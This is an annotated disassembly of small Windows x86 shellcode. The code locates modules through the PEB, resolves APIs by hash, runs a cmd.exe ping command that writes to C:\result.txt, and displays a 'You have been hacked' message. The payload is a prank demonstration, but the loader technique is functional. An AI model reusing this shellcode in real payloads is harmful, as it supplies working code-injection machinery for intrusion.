
0x0 call 5                                   e8 00 00 00 00         .....
     ; ***Shellcode Entry Point, offset 0x0***                                            
	 label_0x5:
0x5 pop edx                                  5a                     Z
     ; GetPC                                                                      
0x6 lea edx, [edx - 5]                       8d 52 fb               .R.
0x9 mov ebp, esp                             89 e5                  ..
0xb sub esp, 0x1000                          81 ec 00 10 00 00      ......
0x11 push edx                                 52                     R
0x12 mov ebx, 0x4b1ffe8e                      bb 8e fe 1f 4b         ....K
0x17 call 0xe4                                e8 c8 00 00 00         .....
0x1c pop edx                                  5a                     Z
0x1d push ebp                                 55                     U
0x1e push edx                                 52                     R
0x1f mov ebp, eax                             89 c5                  ..
0x21 lea esi, [edx + 0x17f]                   8d b2 7f 01 00 00      ......
0x27 lea edi, [edx + 0x193]                   8d ba 93 01 00 00      ......
0x2d call 0x11a                               e8 e8 00 00 00         .....
0x32 pop edx                                  5a                     Z
0x33 pop ebp                                  5d                     ]
0x34 push ebp                                 55                     U
0x35 push edx                                 52                     R
0x36 lea esi, [edx + 0x25e]                   8d b2 5e 02 00 00      ..^...
0x3c push 5                                   6a 05                  j.
0x3e push esi                                 56                     V
0x3f push dword ptr [edx + 0x19f]             ff b2 9f 01 00 00      ......
0x45 pop eax                                  58                     X
0x46 call eax                                 ff d0                  ..
0x48 pop edx                                  5a                     Z
0x49 pop ebp                                  5d                     ]
0x4a push edx                                 52                     R
0x4b mov ebx, 0x4434aacc                      bb cc aa 34 44         ...4D
0x50 call 0xe4                                e8 8f 00 00 00         .....
0x55 pop edx                                  5a                     Z
0x56 push ebp                                 55                     U
0x57 push edx                                 52                     R
0x58 mov ebp, eax                             89 c5                  ..
0x5a lea esi, [edx + 0x1a3]                   8d b2 a3 01 00 00      ......
0x60 lea edi, [edx + 0x1ab]                   8d ba ab 01 00 00      ......
0x66 call 0x11a                               e8 af 00 00 00         .....
0x6b pop edx                                  5a                     Z
0x6c pop ebp                                  5d                     ]
0x6d push ebp                                 55                     U
0x6e push edx                                 52                     R
0x6f lea esi, [edx + 0x289]                   8d b2 89 02 00 00      ......
0x75 push esi                                 56                     V
0x76 push dword ptr [edx + 0x1ab]             ff b2 ab 01 00 00      ......
0x7c pop eax                                  58                     X
0x7d call eax                                 ff d0                  ..
0x7f pop edx                                  5a                     Z
0x80 pop ebp                                  5d                     ]
0x81 push ebp                                 55                     U
0x82 push edx                                 52                     R
0x83 lea eax, [edx + 0x1e6]                   8d 82 e6 01 00 00      ......
0x89 push eax                                 50                     P
0x8a call dword ptr [edx + 0x19b]             ff 92 9b 01 00 00      ......
0x90 pop edx                                  5a                     Z
0x91 pop ebp                                  5d                     ]
0x92 push ebp                                 55                     U
0x93 push edx                                 52                     R
0x94 mov ebp, eax                             89 c5                  ..
0x96 lea esi, [edx + 0x1af]                   8d b2 af 01 00 00      ......
0x9c lea edi, [edx + 0x1b3]                   8d ba b3 01 00 00      ......
0xa2 call 0x11a                               e8 73 00 00 00         .s...
0xa7 pop edx                                  5a                     Z
0xa8 pop ebp                                  5d                     ]
0xa9 push 0                                   6a 00                  j.
0xab lea ebx, [edx + 0x1f1]                   8d 9a f1 01 00 00      ......
0xb1 push ebx                                 53                     S
0xb2 push ebx                                 53                     S
0xb3 push 0                                   6a 00                  j.
0xb5 call dword ptr [edx + 0x1b3]             ff 92 b3 01 00 00      ......
0xbb ret                                      c3                     .

0xbc push ebp                                 55                     U
0xbd push edx                                 52                     R
0xbe lea eax, [edx + 0x1db]                   8d 82 db 01 00 00      ......
0xc4 push eax                                 50                     P
0xc5 call dword ptr [edx + 0x19b]             ff 92 9b 01 00 00      ......
0xcb pop edx                                  5a                     Z
0xcc pop ebp                                  5d                     ]
0xcd push ebp                                 55                     U
0xce push edx                                 52                     R
0xcf mov ebp, eax                             89 c5                  ..
0xd1 lea esi, [edx + 0x1b7]                   8d b2 b7 01 00 00      ......
0xd7 lea edi, [edx + 0x1cb]                   8d ba cb 01 00 00      ......
0xdd call 0x11a                               e8 38 00 00 00         .8...
0xe2 pop edx                                  5a                     Z
0xe3 pop ebp                                  5d                     ]
	 label_0xe4:
0xe4 cld                                      fc                     .
0xe5 xor edi, edi                             31 ff                  1.
0xe7 mov edi, dword ptr fs:[0x30]             64 8b 3d 30 00 00 00   d.=0...
    ; load TIB                                                                    
0xee mov edi, dword ptr [edi + 0xc]           8b 7f 0c               ...
    ; load PEB_LDR_DATA LoaderData                                                
0xf1 mov edi, dword ptr [edi + 0x14]          8b 7f 14               ...
    ; LIST_ENTRY InMemoryOrderModuleList                                            
	 label_0xf4:
0xf4 mov esi, dword ptr [edi + 0x28]          8b 77 28               .w(
0xf7 xor edx, edx                             31 d2                  1.
	 label_0xf9:
0xf9 lodsw ax, word ptr [esi]                 66 ad                  f.
0xfb test al, al                              84 c0                  ..
0xfd je 0x110                                 74 11                  t.

0xff cmp al, 0x41                             3c 41                  <A
0x101 jb 0x109                                 72 06                  r.

0x103 cmp al, 0x5a                             3c 5a                  <Z
0x105 ja 0x109                                 77 02                  w.

0x107 or al, 0x20                              0c 20                  . 
	 label_0x109:
0x109 rol edx, 7                               c1 c2 07               ...
0x10c xor dl, al                               30 c2                  0.
0x10e jmp 0xf9                                 eb e9                  ..

	 label_0x110:
0x110 cmp edx, ebx                             39 da                  9.
0x112 mov eax, dword ptr [edi + 0x10]          8b 47 10               .G.
0x115 mov edi, dword ptr [edi]                 8b 3f                  .?
0x117 jne 0xf4                                 75 db                  u.

0x119 ret                                      c3                     .

	 label_0x11a:
0x11a mov edx, ebp                             89 ea                  ..
0x11c add edx, dword ptr [edx + 0x3c]          03 52 3c               .R<
0x11f mov edx, dword ptr [edx + 0x78]          8b 52 78               .Rx
0x122 add edx, ebp                             01 ea                  ..
0x124 mov ebx, dword ptr [edx + 0x20]          8b 5a 20               .Z 
0x127 add ebx, ebp                             01 eb                  ..
0x129 xor ecx, ecx                             31 c9                  1.
	 label_0x12b:
0x12b push edi                                 57                     W
0x12c push esi                                 56                     V
0x12d mov esi, dword ptr [esi]                 8b 36                  .6
	 label_0x12f:
0x12f mov edi, dword ptr [ebx]                 8b 3b                  .;
0x131 add edi, ebp                             01 ef                  ..
0x133 push edx                                 52                     R
0x134 xor edx, edx                             31 d2                  1.
	 label_0x136:
0x136 rol edx, 7                               c1 c2 07               ...
0x139 xor dl, byte ptr [edi]                   32 17                  2.
0x13b inc edi                                  47                     G
0x13c cmp byte ptr [edi], 0                    80 3f 00               .?.
0x13f jne 0x136                                75 f5                  u.

0x141 xchg eax, edx                            92                     .
0x142 pop edx                                  5a                     Z
0x143 cmp eax, esi                             39 f0                  9.
0x145 je 0x153                                 74 0c                  t.

0x147 add ebx, 4                               83 c3 04               ...
0x14a inc ecx                                  41                     A
0x14b cmp dword ptr [edx + 0x18], ecx          39 4a 18               9J.
0x14e jne 0x12f                                75 df                  u.

0x150 pop esi                                  5e                     ^
0x151 pop edi                                  5f                     _
0x152 ret                                      c3                     .

	 label_0x153:
0x153 pop esi                                  5e                     ^
0x154 pop edi                                  5f                     _
0x155 lodsd eax, dword ptr [esi]               ad                     .
0x156 push esi                                 56                     V
0x157 push ebx                                 53                     S
0x158 mov ebx, ebp                             89 eb                  ..
0x15a mov esi, ebx                             89 de                  ..
0x15c add ebx, dword ptr [edx + 0x24]          03 5a 24               .Z$
0x15f lea eax, [ebx + ecx*2]                   8d 04 4b               ..K
0x162 movzx eax, word ptr [eax]                0f b7 00               ...
0x165 lea eax, [esi + eax*4]                   8d 04 86               ...
0x168 add eax, dword ptr [edx + 0x1c]          03 42 1c               .B.
0x16b mov eax, dword ptr [eax]                 8b 00                  ..
0x16d add eax, esi                             01 f0                  ..
0x16f stosd dword ptr es:[edi], eax            ab                     .
0x170 pop ebx                                  5b                     [
0x171 pop esi                                  5e                     ^
0x172 add ebx, 4                               83 c3 04               ...
0x175 inc ecx                                  41                     A
0x176 cmp dword ptr [esi], 0xffff              81 3e ff ff 00 00      .>....
0x17c jne 0x12b                                75 ad                  u.

0x17e ret                                      c3                     .

0x17f db 0xc7                                  c7                     .
0x180 mov dh, byte ptr [ecx]                   8a 31                  .1
0x182 inc esi                                  46                     F
0x183 out dx, al                               ee                     .
0x184 ljmp 0xc8ac:0x80261fc0                   ea c0 1f 26 80 ac c8   ...&...
0x18b lodsd eax, dword ptr [esi]               ad                     .
0x18c insd dword ptr es:[edi], dx              6d                     m
0x18d mov edi, 0xffffe8                        bf e8 ff ff 00         .....
0x192 add byte ptr [ecx], al                   00 01                  ..
0x194 add byte ptr [eax], al                   00 00                  ..
0x196 add byte ptr [eax + eax], al             00 04 00               ...
0x199 add byte ptr [eax], al                   00 00                  ..
0x19b add al, byte ptr [eax]                   02 00                  ..
0x19d add byte ptr [eax], al                   00 00                  ..
0x19f add eax, dword ptr [eax]                 03 00                  ..
0x1a1 add byte ptr [eax], al                   00 00                  ..
0x1a3 aam 0x4a                                 d4 4a                  .J
0x1a5 rcr byte ptr [edi + 0xffff], 1           c0 9f ff ff 00 00 01   .......
0x1ac add byte ptr [eax], al                   00 00                  ..
0x1ae add byte ptr [0x5abbc68], cl             00 0d 68 bc ab 05      ..h...
0x1b4 add byte ptr [eax], al                   00 00                  ..
0x1b6 add dh, bl                               00 de                  ..
0x1b8 shr byte ptr [ebp - 0x523f2122], 0xde    c0 ad de de c0 ad de   .......
0x1bf faddp st(0)                              de c0                  ..
0x1c1 lodsd eax, dword ptr [esi]               ad                     .
0x1c2 db 0xde                                  de                     .
0x1c3 faddp st(0)                              de c0                  ..
0x1c5 lodsd eax, dword ptr [esi]               ad                     .
0x1c6 fdivp st(7)                              de ff                  ..
0x1c8 inc dword ptr [eax]                      ff 00                  ..
0x1ca add byte ptr [ebx], al                   00 03                  ..
0x1cc add byte ptr [eax], al                   00 00                  ..
0x1ce add byte ptr [eax + eax], al             00 04 00               ...
0x1d1 add byte ptr [eax], al                   00 00                  ..
0x1d3 add eax, 0x6000000                       05 00 00 00 06         .....
0x1d8 add byte ptr [eax], al                   00 00                  ..
0x1da db 0x00                                  00                     .
0x1db ws2_32.dll ; string		         77 73 32 5f 33 32 2e 64 ... ws2_32.dll
0x1e5 db 0x00                                  00                     .
0x1e6 user32.dll ; string		         75 73 65 72 33 32 2e 64 ... user32.dll
0x1f0 db 0x00                                  00                     .
0x1f1 You have been hacked by an elite haxor. Your IP address is now stored in C:\result.txt but it is encrypted :)cmd.exe /c ping google.com > C:\result.txt ; string		  59 6f 75 20 68 61 76 65 ... You have been hacked by an elite haxor. Your IP address is now stored in C:\result.txt but it is encrypted :)cmd.exe /c ping google.com > C:\result.txt
0x288 db 0x00                                  00                     .
0x289 C:\result.txt ; string		      43 3a 5c 72 65 73 75 6c ... C:\result.txt
0x296 db 0x00                                  00                     .
